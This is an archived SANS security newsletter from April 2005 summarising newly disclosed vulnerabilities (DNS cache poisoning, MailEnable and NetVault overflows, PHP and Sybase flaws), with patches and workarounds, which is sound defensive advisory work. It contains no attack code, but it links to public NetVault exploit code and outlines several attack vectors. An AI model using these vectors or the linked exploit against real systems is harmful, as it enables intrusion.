NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > SANS> 2005

RISK: The Consensus Security Vulnerability Alert Vol. 4 No. 14

From: The SANS Institute (ConsensusSecurityVulnerabilityAlertsans.org)
Date: Fri Apr 08 2005 - 07:15:14 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

DNS Cache Poisoning appears to be a big and fast-growing problem.
Windows and Bind users should review number 1 below for a description of
the problem and how to block it. Separately, if you are using Windows
2003, definitely explore Service Pack 1 for a slew of important security
improvements.

Alan

*************************************************************************
RISK: The Consensus Security Vulnerability Alert
April 7, 2005 Vol. 4. Week 14
*************************************************************************

RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:
Platform # of Updates & Vulnerabilities

Windows 1 (#6)
Other Microsoft Products 1 (#2)
Third Party Windows Apps 5 (#5)
Linux 2
BSD 1
Aix 1
Unix 3
Cross Platform 15 (#1, #3, #4, #7)
Web Application 8
______________________________________________________________________

****************** Sponsored by Secure Software *************************

SANS is happy to bring you the latest in our complimentary series of
Secure Software Webcasts. Database risks explored in depth at
https://www.sans.org/webcasts/show.php?webcastid=90568

*************************************************************************

Table of Contents:
Part I -- Critical Vulnerabilities from TippingPoint
(www.tippingpoint.com)

Widely Deployed Software
(1) HIGH: DNS Cache Poisoning Attacks
(2) MODERATE: Microsoft Jet Database Engine Overflow
(3) LOW: PHP getimagesize Denial of Service

Other Software
(4) CRITICAL: BakBone Netvault Backup Software Buffer Overflow
(5) HIGH: MailEnable IMAP Service Buffer Overflow

Updates
(6) Microsoft 2003 Service Pack 1
(7) Sybase Adaptive Server Enterprise Vulnerabilities

************************ Sponsored Links ********************************
Note: These links redirect to sites outside the SANS site.

1) Top Layer - 2005 NSS Group "Double Approval" for Rate &
Content-based Intrusion Prevention. Report
http://www.sans.org/info.php?id=752

2) Stop worm outbreaks without stopping your business. FREE Worm
Suppression white paper.
http://www.sans.org/info.php?id=753

*************************************************************************
Highlighted Training Program of the Week
Rocky Mountain SANS 2005, in Denver in May offers nine immersion tracks
plus short programs on Cutting Edge Hacker Techniques, Security Policy
Development, Security Awareness Training, and more. Wonderful teachers
give you material you can put to work immediately upon returning to the
office and present the most current tools and techniques. Details at
http://www.sans.org/rockymnt2005

What attendees say:
"SANS is the gold standard in network security training, in terms of
relevance of material, knowledgeable instructors, and sheer usefulness."
(Steve Keifling, SGI)
*************************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from
Qualys (www.qualys.com)

-- Windows
05.14.1 - Windows Server 2003 Multiple Vulnerabilities
-- Other Microsoft Products
05.14.2 - Jet Database Engine Malformed Database File Buffer Overflow
-- Third Party Windows Apps
05.14.3 - BlueSoleil Object Push Service Directory Traversal
05.14.4 - RUMBA Profile Handling Multiple Buffer Overflow Vulnerabilities
05.14.5 - MailEnable Unspecified IMAP Vulnerability
05.14.6 - MailEnable Unspecified SMTP Denial of Service
05.14.7 - DameWare Mini Remote Control Server Privilege Escalation
-- Linux
05.14.8 - gdk-pixbuf Double Free Remote Denial of Service
05.14.9 - Gaim Jabber File Request Remote Denial of Service
-- BSD
05.14.10 - OpenBSD TCP Stack Denial of Service
-- Aix
05.14.11 - IBM AIX NIS Client Remote Vulnerability
-- Unix
05.14.12 - Remstats Remote Command Execution Vulnerability
05.14.13 - Gaim_Markup_Strip_HTML Remote Denial of Service
05.14.14 - Gaim IRC Protocol Plug-in Markup Language Injection
-- Cross Platform
05.14.15 - PHP Image File Format Remote Denial of Service
05.14.16 - PHP JPEG File Format Remote Denial of Service
05.14.17 - BakBone NetVault Remote Heap Overflow
05.14.18 - Quake 3 Engine Message Denial of Service
05.14.19 - Star Wars Jedi Knight: Jedi Academy Buffer Overflow
05.14.20 - Call of Duty United Offensive Denial of Service
05.14.21 - Acrobat Reader ActiveX Control LoadFile Information Disclosure
05.14.22 - Mozilla Suite/Firefox JavaScript Lambda Replace Memory Disclosure
05.14.23 - IBM iSeries AS400 LDAP Server Remote Information Disclosure
05.14.24 - CommuniGate Pro LIST Unspecified Denial of Service
05.14.25 - Sybase Adaptive Server Enterprise Remote Denial of Service
05.14.26 - Sybase Adaptive Server Enterprise Attrib_Valid Remote Buffer Overflow
05.14.27 - Sybase Adaptive Server Enterprise Declare Extension Buffer Overflow
05.14.28 - Sybase Adaptive Server Enterprise Convert Function Buffer Overflow
05.14.29 - PHP Nuke Downloads Cross-Site Scripting
-- Web Application
05.14.30 - PHPNuke Multiple Module Cross-Site Scripting Vulnerabilities
05.14.31 - Logics Software LOG-FT Arbitrary File Disclosure
05.14.32 - Comersus Cart Username Field HTML Injection
05.14.33 - RunCMS Remote Arbitrary File Upload Vulnerability
05.14.34 - Pavuk Multiple Unspecified Vulnerabilities
05.14.35 - PHP-Nuke Your_Account Module Avatarcategory Cross-Site Scripting
05.14.36 - PHP-Nuke Web_Links Module Multiple Cross-Site Scripting Vulnerabilities
05.14.37 - Active Auction House Multiple Cross-Site Scripting Vulnerabilities

______________________________________________________________________

PART I Critical Vulnerabilities
Part I is compiled by Rohit Dhamankar (rohitd_at_tippingpoint.com) at
TippingPoint, a division of 3Com, as a by-product of that company's
continuous effort to ensure that its intrusion prevention products
effectively block exploits using known vulnerabilities. TippingPoint's
analysis is complemented by input from a council of security managers
from twelve large organizations who confidentially share with SANS the
specific actions they have taken to protect their systems. A detailed
description of the process may be found at
http://www.sans.org/newsletters/cva/#process
Archives at http://www.sans.org/newsletters/risk

************************
Widely Deployed Software
*************************

(1) HIGH: DNS Cache Poisoning Attacks
Affected:
Windows NT and Windows 2000(prior to SP3) DNS servers in the default
configuration The following configurations are also reportedly
vulnerable and being investigated: Windows DNS server forwarding
requests to a BIND DNS server running version 4.x or 8.x Windows DNS
server forwarding requests to another vulnerable Windows DNS server

Description: SANS Internet Storm Center (ISC) has been actively
analyzing reports of large-scale DNS cache poisoning attacks underway.
By performing the DNS cache poisoning, an attacker is able to direct
traffic intended for legitimate domains (for instance,
windowsupdate.com) to an IP address under the attacker's control. The
attacks have been used to re-direct popular domains belonging to a
number of financial, entertainment, travel, health and software
companies to the attackers' servers in order to install malware on the
user systems. The attacks are targeting flaws in the Symantec Gateway
security products (described in an earlier RISK newsletter), and the
forwarding configurations using Windows and BIND DNS servers listed
above.

Status: Microsoft has published an article KB241352 that describes how
to set up a registry key on Windows 2000 (prior to SP3) and NT 4.0 (SP4
and later) to harden a DNS server's configuration. An upgrade to version
9.x for the DNS forwarding servers running BIND is recommended. An
upgrade to Windows 2000 (SP3 or above) and Windows 2003 is recommended
for Windows DNS servers since these versions offer protection against
the cache poisoning attacks in their default configuration. Symantec has
already released updates for its DNS products that should be immediately
applied. ISC has also detailed steps on how to clean the current DNS
cache, which may be polluted.

Council Site Actions: Most of the reporting council sites are running
only UNIX-based DNS and BIND servers with safe configurations and thus
are not vulnerable to this issue. A few sites running Windows versions
have either confirmed their configurations are safe or have updated
them, as necessary. One site is implementing a rapid response plan based
on a previous risk assessment of this threat situation.

References: ISC DNS Cache Poisoning Report
http://isc.sans.org/presentations/dnspoisoning.php Microsoft KB241352
http://support.microsoft.com/default.aspx?scid=kb;en-us;241352 SANS
Handler's Diary Postings http://isc.sans.org/diary.php?date=2005-04-07
http://isc.sans.org/diary.php?date=2005-04-03
http://isc.sans.org/diary.php?date=2005-04-01
http://isc.sans.org/diary.php?date=2005-03-31
http://isc.sans.org/diary.php?date=2005-03-30 Symantec Gateway Products
(patches available)
http://www.sans.org/newsletters/risk/display.php?v=4&i=11#widely1
[Editor's Note (Paller): The documentation of the DNS Cache Poisoning
problem is proof once again of the extraordinary value that comes from
security community participation and sharing. Organizations being
attacked share their logs with the Internet Storm Center where volunteer
incident handlers (recruited from among the best and brightest security
people in the world) perform deep analysis and bring in other experts.
They work together to provide early warnings to Internet users, with
sufficient analytical detail to enable vendors and users to act quickly
to remove or reduce a real threat.]
*******************************************************************

(2) MODERATE: Microsoft Jet Database Engine Overflow
Affected:
Jet Database Engine all versions

Description: The Jet Database Engine (Msjet40.dll) is Microsoft's
relational database engine that handles the entire task of database
processing for Microsoft Access and Visual Basic. This engine reportedly
contains a buffer overflow that can be triggered by a specially crafted
".mdb" Access database file. The flaw, according to the discoverer, can
be easily exploited to execute code on a Windows client system. In order
to exploit this flaw, an attacker has to supply the malicious .mdb file
via web, email, peer-to-peer sharing etc to the victim. Note that
Internet Explorer and other browsers do not automatically open the
attacker-supplied ".mdb" file. Hence, user interaction is required to
leverage this flaw. A proof-of-concept database file has been publicly
posted. The discoverer also mentions other denial-of-service flaws in
this DLL for which no technical details have been posted.

Status: Microsoft has not confirmed; no patches are available. The flaw
also affects third party applications that use msjet40.dll.

Council Site Actions: Most of the council sites are waiting for
confirmation and a patch from the vendor and plan to deploy the patch
once available. One site commented they have no plans to patch at this
time, and will instead rely on their implementation of the Cisco
Security Agent to prevent this exploit from occurring.

References:
Posting by HexView (the discoverer)
http://archives.neohapsis.com/archives/fulldisclosure/2005-03/0895.html
Microsoft Jet Database Engine Overview
http://msdn.microsoft.com/archive/en-us/dnaraccessdev/html/odc_jetdatabaseengine20ausersoverview.asp
SecurityFocus BID
http://www.securityfocus.com/bid/12960

****************************************************************

(2) LOW: PHP getimagesize Denial of Service
Affected:
PHP versions prior to 4.3.11 and 5.0.4

Description: PHP, the popular scripting language for web servers,
contains two vulnerabilities in its "getimagesize()" function. This
function is used to compute the size of many image formats such as GIFF,
JPEG etc. An attacker can exploit these flaws to cause a denial of
service to any webserver that is using PHP scripts( and the
getimagesize() function) to process the user-supplied images. The
technical details required to craft a malicious image file have been
publicly posted.

Status: Upgrade to PHP version 4.3.11 or 5.0.4.

Council Site Actions: Only one of the reporting council sites is using
the affects software and feature. Their servers will be updated through
a vendor patch (e.g., a patch associated with a Linux distribution)
rather than updated with software obtained directly from www.php.net.

References:
iDefense Advisory
http://www.idefense.com/application/poi/display?id=222&type=vulnerabilities
Vendor Homepage
http://www.php.net/
SecurityFocus BIDs
http://www.securityfocus.com/bid/12962

****************************************************************

************************
Other Software
***********************

(3) CRITICAL: BakBone Netvault Backup Software Buffer Overflow
Affected:
NetVault version 7.3 and earlier on various platforms

Description: Bakbone Netvault is a backup solution for environments
running UNIX, Linux, Windows NT/2000/2003 or Netware. The software is
reportedly being used by AT&T, Los Alamos National Laboratory and many
other large enterprises. The implementation of the communication
protocol between the Netvault client (the system being backed up) and
the server (the system backing up the data) contains a heap-based buffer
overflow. By sending specially crafted packets to the port 20031/tcp,
an attacker can execute arbitrary code on the system running this
software. Exploit code for leveraging this flaw on Windows platforms is
publicly available.

Status: Vendor not confirmed, no updates available. A workaround is to
block the ports 20031/tcp and 20031/udp (the Netvault default ports) at
the network perimeter. Increased scanning activity has been noticed for
the port 20031/tcp.

Council Site Actions: The affected software is not in production or
widespread use, or is not officially supported at any of the council
sites. They reported that no action was necessary.

References:
http://class101.org/netv-remhbof.pdf
Exploit Code
http://class101.org/36/55/462/101_netvault.zip
Typical Netvault Port Configuration
http://www.bakbone.com/docs/NetVault%20Configurator%20Guide7_1.pdf
Vendor Homepage
http://www.bakbone.com/
SecurityFocus BID
http://www.securityfocus.com/bid/12967/

****************************************************************

(4) HIGH: MailEnable IMAP Service Buffer Overflow
Affected:
MailEnable Enterprise version 1.04 and prior
MailEnable Professional version 1.54 and prior

Description: MailEnable, a Windows-based mail server, contains buffer
overflows in its IMAP server (MEIMAPS.EXE). An unauthenticated attacker
can trigger the flaw by sending an overlong argument to the
"AUTHENTICATE" or "LOGIN" commands. The flaws can be exploited to
execute arbitrary code with the privileges of the IMAP server. Exploit
code has been publicly posted.

Status: Vendor has confirmed the buffer overflow in the "AUTHENTICATE"
command and released hotfixes. The status of hotfixes for the "LOGIN"
command overflow is unknown.

Council Site Actions: The affected software is not in production or
widespread use, or is not officially supported at any of the council
sites. They reported that no action was necessary.

References:
Posting by Expanders
http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0078.html
Posting by H.D. Moore
http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0099.html
Vendor Homepage
http://www.mailenable.com
SecurityFocus BIDs
http://www.securityfocus.com/bid/12995
http://www.securityfocus.com/bid/13040

****************************************************************

****************
Updates
****************

(6) Windows 2003 Service Pack 1

Microsoft has released Service Pack 1 for Windows 2003. This update
includes many security features such as Windows firewall, enhanced
memory checks to protect against buffer overflows, protection from
malicious e-mail and more authentication checks for RPC services.

References:
http://www.microsoft.com/WindowsServer2003/downloads/servicepacks/sp1/sp1datasheet.mspx

******************************************************************

(7) Sybase Adaptive Server Enterprise Vulnerabilities

After an initial push back from Sybase, NGSSoftware has finally released
the technical details regarding the vulnerabilities in the Sybase
Adaptive Server Enterprise that were patched in December 2004. The
Sybase administrators should apply the patches as soon as possible, if
they have not already done so.

References:
NGSSoftware Posting
http://archives.neohapsis.com/archives/vulnwatch/2005-q2/0002.html
Previous RISK Newsletter Posting
http://www.sans.org/newsletters/risk/display.php?v=3&i=51#other1

***********************************************************************
SANSHOME Program
When a live conference is not an option due to cost, time away or visa
issues, try SANSHOME Weekly Webcasts. Great course leaders, same
material, great way to learn, and less expensive. For details, go to
http://www.sans.org/athome

***********************************************************************

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 14, 2005

This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 4201 unique vulnerabilities. For this special
SANS community listing, Qualys also includes vulnerabilities that cannot
be scanned remotely.

______________________________________________________________________

05.14.1 CVE: Not Available
Platform: Windows
Title: Windows Server 2003 Multiple Vulnerabilities
Description: Microsoft Windows Server 2003 SP1 was released to address
multiple vulnerabilities. Please see vendor release notes for
details.
Ref: http://www.microsoft.com/windowsserver2003/downloads/servicepacks/sp1/default.mspx
______________________________________________________________________

05.14.2 CVE: CAN-2004-0197
Platform: Other Microsoft Products
Title: Jet Database Engine Malformed Database File Buffer Overflow
Description: Microsoft Jet Database Engine (Jet) is used to provide
data access to various applications. It is reported to be vulnerable
to a buffer overflow issue due to improper boundary checks of
user-supplied database file contents. "msjet40.dll" library version
4.00.8618.0 and earlier are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12960
______________________________________________________________________

05.14.3 CVE: Not Available
Platform: Third Party Windows Apps
Title: BlueSoleil Object Push Service Directory Traversal
Description: BlueSoleil, a bluetooth software package, is reported
vulnerable to directory traversal attacks in its Object Push Service.
Clients can specify the destination directory for uploads using
directory traversal sequences. Attackers can leverage this to install
trojans on the vulnerable system.
Ref: http://www.digitalmunition.com/DMA%5B2005-0401a%5D.txt
______________________________________________________________________

05.14.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: RUMBA Profile Handling Multiple Buffer Overflow
Vulnerabilities
Description: RUMBA provides information that may be accessed from any
desktop or server-managed client. Insufficient sanitization of the
"SysName" value in an RTO profile and a section of the WPA profile
exposes the software to a buffer overflow issue. RUMBA version 7.3 is
affected.
Ref: http://www.securityfocus.com/archive/1/394800
______________________________________________________________________

05.14.5 CVE: CAN-2005-0804
Platform: Third Party Windows Apps
Title: MailEnable Unspecified IMAP Vulnerability
Description: MailEnable is a commercially available mail server. It is
vulnerable to an unspecified remote security issue in the server's
IMAP implementation. All unpatched versions of MailEnable Enterprise
Edition and MailEnable Professional 1.5 and later are vulnerable.
Ref: http://www.mailenable.com/hotfix/
______________________________________________________________________

05.14.6 CVE: Not Available
Platform: Third Party Windows Apps
Title: MailEnable Unspecified SMTP Denial of Service
Description: MailEnable is a mail server for the Microsoft Windows
platform. It is reported to be vulnerable to an unspecified issue that
may allow remote attackers to crash the SMTP service. MailEnable
Professional 1.54, MailEnable Enterprise Edition 1.0.4 and earlier are
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12994
______________________________________________________________________

05.14.7 CVE: Not Available
Platform: Third Party Windows Apps
Title: DameWare Mini Remote Control Server Privilege Escalation
Description: DameWare Mini Remote Control Server is a remote
administration tool. It is reported to be vulnerable to a remote
privilege escalation issue. DameWare Mini Remote Control Server
versions 4.8 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13023
______________________________________________________________________

05.14.8 CVE: CAN-2005-0891
Platform: Linux
Title: gdk-pixbuf Double Free Remote Denial of Service
Description: gdk-pixbuf is a GNOME library. It is vulnerable to a
denial of service vulnerability when handling malformed bitmap image
files. gdk-pixbuf version 0.22.0 and gtk2 version 2.4.14 are
vulnerable.
Ref: http://rhn.redhat.com/errata/RHSA-2005-344.html
______________________________________________________________________

05.14.9 CVE: CAN-2005-0967
Platform: Linux
Title: Gaim Jabber File Request Remote Denial of Service
Description: Gaim is an instant messaging client that supports
numerous protocols. It is vulnerable to a remote denial of service
issue which can be exploited by an attacker to crash the application.
Gaim versions 1.2.0 and earlier are vulnerable.
Ref: http://www.securityfocus.com/advisories/8368
______________________________________________________________________

05.14.10 CVE: CAN-2005-0960
Platform: BSD
Title: OpenBSD TCP Stack Denial of Service
Description: OpenBSD TCP stack is vulnerable to a denial of service
issue when processing invalid SACK options. OpenBSD versions 3.5 and
3.6 are vulnerable.
Ref: http://www.openbsd.org/errata.html#sack
______________________________________________________________________

05.14.11 CVE: Not Available
Platform: Aix
Title: IBM AIX NIS Client Remote Vulnerability
Description: NIS is designed to assist in the administration of
networks. IBM AIX NIS client is affected by a remote arbitrary code
execution issue which could allow remote attackers to gain
unauthorized access to a vulnerable machine with superuser privileges.
IBM AIX version 5.3 is affected.
Ref: http://www.securityfocus.com/bid/13022/info/
______________________________________________________________________

05.14.12 CVE: CAN-2005-0388
Platform: Unix
Title: Remstats Remote Command Execution Vulnerability
Description: Remstats is a suite of applications designed for network
data gathering and presentation. A remote command execution
vulnerability affects Remstats's "remoteping" service. Attackers could
use this towards a system compromise.
Ref: http://www.securityfocus.com/advisories/8351
______________________________________________________________________

05.14.13 CVE: CAN-2005-0965
Platform: Unix
Title: Gaim_Markup_Strip_HTML Remote Denial of Service
Description: Gaim is an instant messaging client that supports
numerous protocols. It is reported vulnerable to a remote denial of
service condition. It is reported that the issue exists in the
"gaim_markup_strip_html" function and leads to an application crash.
This vulnerability is reported to affect Gaim versions 1.2.0 and
earlier.
Ref: http://gaim.sourceforge.net/security/?id=13
______________________________________________________________________

05.14.14 CVE: CAN-2005-0966
Platform: Unix
Title: Gaim IRC Protocol Plug-in Markup Language Injection
Description: Gaim is an instant messaging client. Insufficient
sanitization of user-supplied input exposes the client to numerous
markup language injection issues. Gaim versions 1.2.0 and earlier are
affected.
Ref: http://gaim.sourceforge.net/security/?id=14
______________________________________________________________________

05.14.15 CVE: CAN-2005-0524
Platform: Cross Platform
Title: PHP Image File Format Remote Denial of Service
Description: PHP is affected by a remote denial of service
vulnerability. The issue occurs due to a failure to properly validate
user-controlled file data in the "php_handle_iff()" function. PHP
versions 5.0.3 and earlier are known to be vulnerable.
Ref: http://www.php.net/release_4_3_11.php
______________________________________________________________________

05.14.16 CVE: CAN-2005-0525
Platform: Cross Platform
Title: PHP JPEG File Format Remote Denial of Service
Description: A remote denial of service vulnerability affects PHP. The
problem presents itself when the affected application attempts to
parse a maliciously crafted JPEG file. This occurs due to a failure to
properly validate image header data in the "php_handle_jpeg()"
function defined in "ext/standard/image.c". PHP versions 4.2.2, 4.3.9,
4.3.10 and 5.0.3 are affected.
Ref: http://www.idefense.com/application/poi/display?id=222&type=vulnerabilities
______________________________________________________________________

05.14.17 CVE: Not Available
Platform: Cross Platform
Title: BakBone NetVault Remote Heap Overflow
Description: NetVault is a backup and restore solution. It is reported
to be vulnerable to a remote heap overflow issue due to improper
sanitization of user-supplied input to the "Clientname" variable.
BakBone NetVault versions 7.1 and 7.0 are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12967
______________________________________________________________________

05.14.18 CVE: CAN-2005-0430
Platform: Cross Platform
Title: Quake 3 Engine Message Denial of Service
Description: Quake 3 is a game produced by iD Software. The engine
allows remote attackers to cause a denial of service issue including a
remote shutdown of the game server and possible crash by sending a
long infostring. All games using the Quake 3 engine as mentioned in
the link are affected.
Ref: http://www.securityfocus.com/archive/1/394823
______________________________________________________________________

05.14.19 CVE: Not Available
Platform: Cross Platform
Title: Star Wars Jedi Knight: Jedi Academy Buffer Overflow
Description: Star Wars Jedi Knight: Jedi Academy is a game developed
by Raven Software. It is vulnerable to a stack-based buffer overflow
issue that can be exploited remotely by an attacker to run arbitrary
code on the server. Star Wars Jedi Knight: Jedi Academy 1.0.11 is
vulnerable.
Ref: http://www.securityfocus.com/archive/1/394824
______________________________________________________________________

05.14.20 CVE: Not Available
Platform: Cross Platform
Title: Call of Duty United Offensive Denial of Service
Description: Call of Duty and Call of Duty United Offensive are a
series of games. They are reported to be vulnerable to a denial of
service issue due to improper boundary checks. Call of Duty United
Offensive versions 1.5.1b and earlier are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12978
______________________________________________________________________

05.14.21 CVE: CAN-2005-0035
Platform: Cross Platform
Title: Acrobat Reader ActiveX Control LoadFile Information Disclosure
Description: Adobe Acrobat Reader is an application designed for
reading Portable Document Format (PDF) files. Adobe Acrobat Reader
ActiveX control is affected by an information disclosure
vulnerability. Adobe Acrobat Reader versions 7.0 and earlier are known
to be vulnerable.
Ref: http://www.adobe.com/support/techdocs/331465.html
http://www.adobe.com/support/techdocs/331468.html
______________________________________________________________________

05.14.22 CVE: Not Available
Platform: Cross Platform
Title: Mozilla Suite/Firefox JavaScript Lambda Replace Memory
Disclosure
Description: Mozilla Suite/Firefox are reported vulnerable to a memory
disclosure vulnerability. This issue can allow a remote attacker to
disclose arbitrary heap memory. Firefox versions 1.0.1 and 1.0.2 are
reported vulnerable. Mozilla version 1.7.6 is vulnerable as well.
Ref: https://bugzilla.mozilla.org/show_bug.cgi?id=288688
______________________________________________________________________

05.14.23 CVE: Not Available
Platform: Cross Platform
Title: IBM iSeries AS400 LDAP Server Remote Information Disclosure
Description: IBM iSeries AS400 is an enterprise server solution. Due
to a problem in the implementation of the LDAP server, the software is
exposed to a remote information disclosure issue where user names and
account information can be accessed by unauthorized users. All current
versions are affected.
Ref: http://www.venera.com/downloads/AS400_ldap_user_accounts_disclosure.pdf
______________________________________________________________________

05.14.24 CVE: Not Available
Platform: Cross Platform
Title: CommuniGate Pro LIST Unspecified Denial of Service
Description: CommuniGate Pro is an Internet messaging server.
Communigate Pro is affected by an unspecified denial of service
vulnerability. Communigate Pro versions 4.3 c2 and earlier are known
to be vulnerable.
Ref: http://www.stalker.com/CommuniGatePro/History.html
______________________________________________________________________

05.14.25 CVE: CAN-2005-0942
Platform: Cross Platform
Title: Sybase Adaptive Server Enterprise Remote Denial of Service
Description: Sybase Adaptive Server Enterprise is a full SQL
relational database management system. It is affected by a remote
denial of service vulnerability due to a failure of the affected
application to properly handle malformed network data. A remote
attacker can leverage this issue to cause the affected server to
crash, denying service to legitimate users. ASE versions 12.5.3 and
earlier are vulnerable.
Ref: http://www.securityfocus.com/archive/1/385198
______________________________________________________________________

05.14.26 CVE: Not Available
Platform: Cross Platform
Title: Sybase Adaptive Server Enterprise Attrib_Valid Remote Buffer
Overflow
Description: Sybase Adaptive Server is a full SQL relational database
management system. A buffer overflow vulnerability affects the
"attrib_valid" Transact-SQL extension function. An attacker may
exploit this issue to execute arbitrary code with the privileges of
the affected application. The vendor has released Adaptive Enterprise
Server 12.5.3 ESD#1 to address this issue.
Ref: http://www.ngssoftware.com/advisories/sybase-ase.txt
______________________________________________________________________

05.14.27 CVE: Not Available
Platform: Cross Platform
Title: Sybase Adaptive Server Enterprise Declare Extension Buffer
Overflow
Description: Sybase Adaptive Server is a full SQL relational database
management system. A remote buffer overflow vulnerability affects
Sybase Adaptive Server Enterprise. Attackers can leverage this towards
remote code execution or a denial of service condition.
Ref: http://www.securityfocus.com/archive/1/395001
______________________________________________________________________

05.14.28 CVE: Not Available
Platform: Cross Platform
Title: Sybase Adaptive Server Enterprise Convert Function Buffer
Overflow
Description: Sybase Adaptive Server is a full SQL relational database
management system. It is reported to be vulnerable to a remote buffer
overflow issue due to improper sanitization of user-supplied input to
the "convert" function. Sybase Adaptive Server Enterprise versions
12.5.3 and earlier are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13015
______________________________________________________________________

05.14.29 CVE: Not Available
Platform: Cross Platform
Title: PHP Nuke Downloads Cross-Site Scripting
Description: PHP Nuke is a content management system. The PHP Nuke
"Downloads" module is vulnerable to a cross-site scripting issue due
to the application failing to properly sanitize user supplied URI
input. PHP-Nuke versions 7.6 and earlier are vulnerable.
Ref: http://www.securityfocus.com/archive/1/394971
______________________________________________________________________

05.14.30 CVE: Not Available
Platform: Web Application
Title: PHPNuke Multiple Module Cross-Site Scripting Vulnerabilities
Description: PHPNuke is a web-based portal system. It is reported to
be vulnerable to a cross-site scripting issue due to improper
sanitization of user-supplied input. PHPNuke versions 7.6 and earlier
are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/12983
______________________________________________________________________

05.14.31 CVE: Not Available
Platform: Web Application
Title: Logics Software LOG-FT Arbitrary File Disclosure
Description: LOG-FT is a web-based application that is used to
transfer files to and from mainframe servers. It is vulnerable to a
file disclosure vulnerablity with the "VAR_FT_LANG" and the
"VAR_FT_TMPL" parameters. All versions of Logics Software LOG-FT are
vulnerable.
Ref: http://www.securityfocus.com/archive/1/394969
______________________________________________________________________

05.14.32 CVE: Not Available
Platform: Web Application
Title: Comersus Cart Username Field HTML Injection
Description: Comersus Cart is a set of ASP scripts creating an online
shopping cart. A remote HTML injection vulnerability affects Comersus
Cart when a malicious user enters HTML and script code through the
"Username" field of the affected application. Comersus Cart version
6.03 is affected by this issue.
Ref: http://www.comersus.com/index.html
______________________________________________________________________

05.14.33 CVE: Not Available
Platform: Web Application
Title: RunCMS Remote Arbitrary File Upload Vulnerability
Description: RunCMS is a web-based messaging system implemented in
PHP. RunCMS is affected by a remote arbitrary file upload
vulnerability. RunCMS versions 1.1A and earlier are known to be
vulnerable.
Ref: http://www.securityfocus.com/archive/1/395097
______________________________________________________________________

05.14.34 CVE: Not Available
Platform: Web Application
Title: Pavuk Multiple Unspecified Vulnerabilities
Description: Pavuk is a web spider application. It is reported to be
vulnerable to multiple unspecified issues due to improper boundary
checks. Pavuk version 0.9.31 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13005
______________________________________________________________________

05.14.35 CVE: Not Available
Platform: Web Application
Title: PHP-Nuke Your_Account Module Avatarcategory Cross-Site
Scripting
Description: PHP-Nuke is a content management system. Insufficient
sanitization of the "Avatarcategory" parameter of the "Your_Account"
module exposes the application to a cross-site scripting issue.
PHP-Nuke versions 7.6 and earlier are affected.
Ref: http://www.securityfocus.com/archive/1/394971
______________________________________________________________________

05.14.36 CVE: Not Available
Platform: Web Application
Title: PHP-Nuke Web_Links Module Multiple Cross-Site Scripting
Vulnerabilities
Description: PHP-Nuke is a content management system. It is vulnerable
to multiple cross-site scripting issues in the "Web_Links" Module. An
attacker may leverage these issues to steal cookie-based
authentication credentials. PHP-Nuke version 7.6 is vulnerable.
Ref: http://www.securityfocus.com/archive/1/394867
______________________________________________________________________

05.14.37 CVE: Not Available
Platform: Web Application
Title: Active Auction House Multiple Cross-Site Scripting
Vulnerabilities
Description: Active Auction House is web-based auction software. It is
reportedly affected by multiple cross-site scripting vulnerabilities.
These can be used towards theft of cookie-based authentication
credentials.
Ref: http://www.securityfocus.com/archive/1/395104
______________________________________________________________________

(c) 2005. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a party
other than Qualys (as indicated herein) and permission to use such
material must be requested from the copyright owner.

==end==
Subscriptions: RISK is distributed free of charge to people responsible
for managing and securing information systems and networks. You may
forward this newsletter to others with such responsibility inside or
outside your organization.

To subscribe, at no cost, go to https://portal.sans.org where you may
also request subscriptions to any of SANS other free newsletters.

To change your subscription, address, or other information, visit
http://portal.sans.org Copyright 2005. All rights reserved. No posting
or reuse allowed, other that listed above, without prior written
permission.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFCVmnT+LUG5KFpTkYRAn/gAJ4y+6gFnZMw0QEKSC/CEFLFEVTnpACeITn4
Tml2+rfa8HWuHkTqBpv+P6o=
=6yk4
-----END PGP SIGNATURE-----

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]